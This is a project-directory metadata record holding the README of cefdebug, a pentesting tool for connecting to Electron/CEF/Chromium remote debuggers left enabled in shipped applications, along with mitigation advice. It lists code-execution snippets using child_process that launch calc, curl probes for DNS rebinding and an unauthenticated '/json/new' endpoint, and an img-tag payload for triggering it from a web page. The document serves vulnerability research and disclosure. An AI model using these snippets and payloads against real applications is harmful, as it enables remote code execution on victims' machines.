{"id":17988742,"url":"https://github.com/taviso/cefdebug","last_synced_at":"2025-06-13T05:04:22.133Z","repository":{"id":148963250,"uuid":"212596758","full_name":"taviso/cefdebug","owner":"taviso","description":"Minimal code to connect to a CEF debugger.","archived":false,"fork":false,"pushed_at":"2020-06-10T23:32:48.000Z","size":79,"stargazers_count":204,"open_issues_count":0,"forks_count":19,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-04-06T14:07:00.912Z","etag":null,"topics":["cef","electron","security","windows"],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/taviso.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-10-03T14:09:45.000Z","updated_at":"2025-03-18T15:26:33.000Z","dependencies_parsed_at":"2023-05-02T23:31:07.817Z","dependency_job_id":null,"html_url":"https://github.com/taviso/cefdebug","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/taviso/cefdebug","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/taviso","download_url":"https://codeload.github.com/taviso/cefdebug/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259584749,"owners_count":22880194,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cef","electron","security","windows"],"created_at":"2024-10-29T19:12:40.441Z","updated_at":"2025-06-13T05:04:22.108Z","avatar_url":"https://github.com/taviso.png","language":"C","funding_links":[],"categories":["Tools"],"sub_categories":["Others"],"readme":"# cefdebug\n\nThis is a minimal commandline utility and/or reference code for using\nlibwebsockets to connect to an electron/CEF/chromium debugger.\n\nYou're probably thinking, \"who would enable the debugger in shipping products?\".\nWell, it turns out just about everyone shipping electron or CEF has made this\nmistake at least once.\n\nIn some configurations, you can pop a shell remotely just by making a victim\nclick a link.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=773\n\nIn older versions, you could pop a shell remotely using DNS rebinding.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1742\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1946\n\nIn current versions, you can compromise other local users or escape sandboxes.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1944\n\nIt happens so often, that I thought pentesters might find it useful to have some\ncode easily available to interact with them.\n\n# Usage\n\nFirst, scan the local machine\n\n```\n$ ./cefdebug.exe\n[2019/10/04 16:18:56:7288] U: There are 3 tcp sockets in state listen.\n[2019/10/04 16:18:56:7766] U: There were 1 servers that appear to be CEF debuggers.\n[2019/10/04 16:18:56:7816] U: ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a\n```\n\nNow you can send commands to that `ws://` URL.\n\n```\n$ ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \"process.version\"\n[2019/10/04 16:35:06:2645] U: \u003e\u003e\u003e process.version\n[2019/10/04 16:35:06:2685] U: \u003c\u003c\u003c v10.11.0\n```\n\nAlternatively, you can start a simple interactive shell.\n\n```\n$ ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a\n\u003e\u003e\u003e ['hello', 'world'].join(' ')\n[2019/10/04 16:36:31:0964] U: \u003c\u003c\u003c hello world\n\u003e\u003e\u003e a = 1024\n[2019/10/04 16:36:44:5250] U: \u003c\u003c\u003c 1024\n\u003e\u003e\u003e a * 2\n[2019/10/04 16:36:48:3005] U: \u003c\u003c\u003c 2048\n\u003e\u003e\u003e quit\n```\n\n### Known Examples\n\nHere are a list of code snippets I've seen that allow code exec in different electron\napplications.\n\n`process.mainModule.require('child_process').exec('calc')`\n\n`window.appshell.app.openURLInDefaultBrowser(\"c:/windows/system32/calc.exe\")`\n\n`require('child_process').spawnSync('calc.exe')`\n\n`Browser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))`\n\n### Notes\nHere are things to test if you find a debugger.\n\n* Does it prevent [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding)?\n\n`$ curl -H 'Host: example.com' -si 'http://127.0.0.1:9234/json/list'`\n\n🚨 If that works (i.e. json response), this is **remotely** exploitable. 🚨\n\nNewer versions of chromium require that the Host header match `localhost` or an\nIP address to prevent this. If this works, the application you're looking at is\nbased on an older version of chromium, and leaving the debugger enabled can be\n**remotely** exploited. You have found a critical vulnerability and should\nreport it urgently.\n\n* Is the `new` command functioning?\n\n`$ curl -si 'http://127.0.0.1:9234/json/new?javascript:alert(1)'`\n\n🔥🚨 If that works (i.e. a json response), this is **easily** **remotely** exploitable. 🚨🔥\n\nThis command requires no authentication, and has no CSRF protection. Just\n`\u003cimg src=http://127.0.0.1:port/json/new?javascript:...\u003e` in a website is\nenough to exploit it. Even if the port is randomized, it can be brute forced\neasily.\n\nThis is a very critical vulnerability, and should be reported urgently.\n\n# Solution\n\nIf you maintain a CEF project and you've noticed you're vulnerable to this\nattack, you probably need to change this setting in your `cef_settings_t`\nfor production builds:\n\nhttps://magpcss.org/ceforum/apidocs3/projects/(default)/_cef_settings_t.html#remote_debugging_port\n\nIn electron, it's possible you're doing something like:\n\n`app.commandLine.appendSwitch('remote-debugging-port'...)`\n\nIf you're using node, perhaps you're using `--inspect` on child processes.\n\nhttps://nodejs.org/de/docs/guides/debugging-getting-started/#security-implications\n\n# Building\n\n## Windows \n\n\u003e If you don't want to build it yourself, check out the [releases](https://github.com/taviso/cefdebug/releases) tab\n\nI used [GNU make](http://gnuwin32.sourceforge.net/packages/make.htm) and Visual\nStudio 2019 to develop `cefdebug`. \n\nIf all the dependencies are installed, just typing `make` in a developer command\nprompt should be enough.\n\nI use the \"Build Tools\" variant of Visual Studio, and the only components I have\nselected are MSVC, MSBuild, CMake and the SDK.\n\nThis project uses submodules for some of the dependencies, be sure that you're\nusing a command like this to fetch all the required code.\n\n```\ngit submodule update --init --recursive\n```\n## Linux\n\nThe main depdencies are libwebsockets and libreadline.\n\nOn Fedora, try:\n\n`yum install readline-devel libwebsockets-devel openssl-devel`\n\nIf the dependencies are intalled, try `make -f GNUmakefile.linux`\n\n## Embedding\n\nThe code is intended to be simple enough to embed in other pentesting tools.\n\n# Authors\n\nTavis Ormandy \u003ctaviso@gmail.com\u003e\n\n# License\n\nAll original code is Apache 2.0, See LICENSE file for details.\n\nThe following components are imported third party projects.\n\n* [wineditline](http://mingweditline.sourceforge.net/), by Paolo Tosco.\n  * wineditline is used to implement user friendly command-line input and\n    history editing.\n* [libwebsockets](https://libwebsockets.org), by Andy Green et al.\n  * libwebsockets is a portable c implementation of HTML5 websockets.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftaviso%2Fcefdebug","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftaviso%2Fcefdebug","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftaviso%2Fcefdebug/lists"}